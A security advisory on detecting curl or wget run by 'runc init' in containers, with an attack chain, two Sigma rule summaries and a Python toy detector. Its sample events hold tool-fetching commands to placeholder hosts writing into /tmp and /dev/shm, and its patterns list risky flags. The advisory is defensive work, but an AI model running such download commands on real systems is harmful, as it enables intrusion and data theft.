Threat Feed
medium advisory

Curl or Wget Execution from Container Context

Detects execution of curl or wget launched directly by the `runc init` process of an OCI/runc-backed container, a pattern that can indicate ingress tool transfer or data exfiltration from a compromised container.

This detection rule identifies curl or wget being executed from a process titled `runc init`. `runc init` is the runtime process that enters a container's namespaces and then execs the requested command; it is used both to start a container's own command and to run commands via `docker exec` or `kubectl exec`. A curl or wget in that position was therefore launched directly through the container runtime rather than by a script already running inside the container, which is what an attacker exec'ing into a compromised pod to pull down tooling, or exfiltrate data, looks like. The context does not by itself indicate a container escape: the process is still inside the container. curl and wget are common in container images, so defenders must separate benign use (init containers and entrypoints fetching configuration, health checks, operators troubleshooting via exec) from malicious use based on the command-line arguments, the destination, and which image and namespace the process ran in.

Attack Chain

  1. Initial compromise of a containerized application or service.
  2. Attacker gains limited shell access within the compromised container.
  3. Attacker attempts to download external tools using curl or wget.
  4. The curl or wget process is spawned from runc init, placing it in container context; this is the step the rule observes.
  5. Downloaded tools may include reverse shells, credential dumping utilities, or data exfiltration scripts.
  6. The attacker executes the downloaded tools to escalate privileges or gather sensitive information.
  7. Data exfiltration occurs via HTTP/HTTPS using curl or wget to transfer data to an external server.
  8. The attacker maintains persistence within the compromised environment for continued access.

Impact

A successful attack could lead to data theft, unauthorized access to sensitive systems, and lateral movement within the cluster or network. How far it spreads depends on the scope of the initial compromise, the privileges and secrets available to the container, and the attacker's objectives. Exposure is broad, since containers are used across all sectors.

Recommendation

  • Deploy the Sigma rule “Detect Curl or Wget Execution from Container Context” to your SIEM to identify suspicious command execution.
  • Investigate any alerts generated by the Sigma rule, focusing on the command-line arguments used with curl or wget, and the network connections established by the container.
  • Review network policies to restrict egress traffic from containers to only authorized destinations.
  • Baseline trusted images and exclude stable image digests or namespaces when noisy, as described in the rule’s false_positives section.
  • Ensure the Auditd Manager integration's syscall coverage includes execve for processes inside containers, as described in the rule's setup instructions; without execve events the rule has nothing to match.

Detection coverage (2 rules)

Detect Curl or Wget Execution from Container Context

medium

Detects execution of curl or wget from processes with 'runc init' title, indicating container context.

Format: Sigma. Tactic: command_and_control. Technique: T1105. Log sources: process_creation, linux.

Detect Curl or Wget with Suspicious Arguments from Container

medium

Detects curl or wget commands with arguments indicating potential malicious activity (e.g., insecure TLS, output redirection) within a container.

Format: Sigma. Tactic: command_and_control. Technique: T1105. Log sources: process_creation, linux.
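As an added example (not the vendor's rule logic, which the page says is only available on the platform), the following Python re-implements both detections listed above over a handful of constructed process_creation events, so the difference in scope between the two rules can be seen directly. Field names follow the Sigma process_creation convention (Image, CommandLine, ParentCommandLine); the `runc init` parent test, the flag lists and the scratch directories are assumptions about what the rules match.

```python
"""Toy re-implementation of the two detections described above, run over
constructed Sigma-style process_creation events.

Added example: this is not the vendor's Sigma rule logic. Field names follow
the Sigma process_creation convention; the 'runc init' parent test, the flag
lists and the scratch directories are assumptions about what the rules match.
"""
import shlex

# Constructed sample telemetry (not real captures). A ParentCommandLine of
# "runc init" is what a process launched directly by the container runtime
# (container command, `docker exec`, `kubectl exec`) looks like.
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -fsSL https://example.invalid/tool.sh -o /tmp/t.sh",
     "ParentImage": "/usr/bin/runc", "ParentCommandLine": "runc init"},
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget --no-check-certificate -O /dev/shm/x http://198.51.100.7/x",
     "ParentImage": "/usr/bin/runc", "ParentCommandLine": "runc init"},
    # benign: liveness probe run by a shell script already inside the container
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -s http://localhost:8080/healthz",
     "ParentImage": "/bin/sh", "ParentCommandLine": "/bin/sh /healthcheck.sh"},
    # container context, but no suspicious arguments: fires rule 1 only
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl https://registry.example.invalid/v2/",
     "ParentImage": "/usr/bin/runc", "ParentCommandLine": "runc init"},
]

DOWNLOADERS = ("/curl", "/wget")
# curl: -k/--insecure; wget: --no-check-certificate
INSECURE_TLS_FLAGS = {"-k", "--insecure", "--no-check-certificate"}
# curl: -o/--output, -O/--remote-name; wget: -O/--output-document
OUTPUT_FLAGS = {"-o", "--output", "-O", "--remote-name", "--output-document"}
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def is_downloader(event):
    return event.get("Image", "").endswith(DOWNLOADERS)


def rule_container_context(event):
    """Rule 1: curl/wget exec'd by a process titled `runc init`."""
    return is_downloader(event) and "runc init" in event.get("ParentCommandLine", "")


def suspicious_argument_reasons(event):
    """Return the reasons rule 2 would flag this command line (empty if none)."""
    try:
        argv = shlex.split(event.get("CommandLine", ""))
    except ValueError:
        return ["unparseable command line"]  # odd quoting is itself worth a look
    reasons = []
    for tok in argv[1:]:
        if tok in INSECURE_TLS_FLAGS:
            reasons.append(f"insecure TLS flag {tok}")
        elif tok in OUTPUT_FLAGS:
            reasons.append(f"output redirection {tok}")
        elif tok.startswith(SCRATCH_DIRS):
            reasons.append(f"writes into scratch dir {tok}")
    return reasons


def rule_suspicious_args(event):
    """Rule 2: container context plus at least one suspicious argument."""
    return rule_container_context(event) and bool(suspicious_argument_reasons(event))


def evaluate(events):
    """Map each rule name to the command lines it matched."""
    hits = {"container_context": [], "suspicious_args": []}
    for ev in events:
        if rule_container_context(ev):
            hits["container_context"].append(ev["CommandLine"])
        if rule_suspicious_args(ev):
            hits["suspicious_args"].append(ev["CommandLine"])
    return hits


if __name__ == "__main__":
    for rule, cmds in evaluate(SAMPLE_EVENTS).items():
        print(f"[{rule}] {len(cmds)} hit(s)")
        for c in cmds:
            reasons = suspicious_argument_reasons({"CommandLine": c})
            print("   ", c, "->", reasons or "context only")
```

Run as a script, rule 1 fires on three of the four events and rule 2 on two, which is the point of pairing a broad context rule with a narrower argument rule. The token-based match deliberately misses bundled short options such as `-fsSLo`; Sigma's `CommandLine|contains` modifier matches substrings and would catch those, at the cost of more hits on benign health checks and entrypoint fetches, which is where the baselining advice under Recommendation applies.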
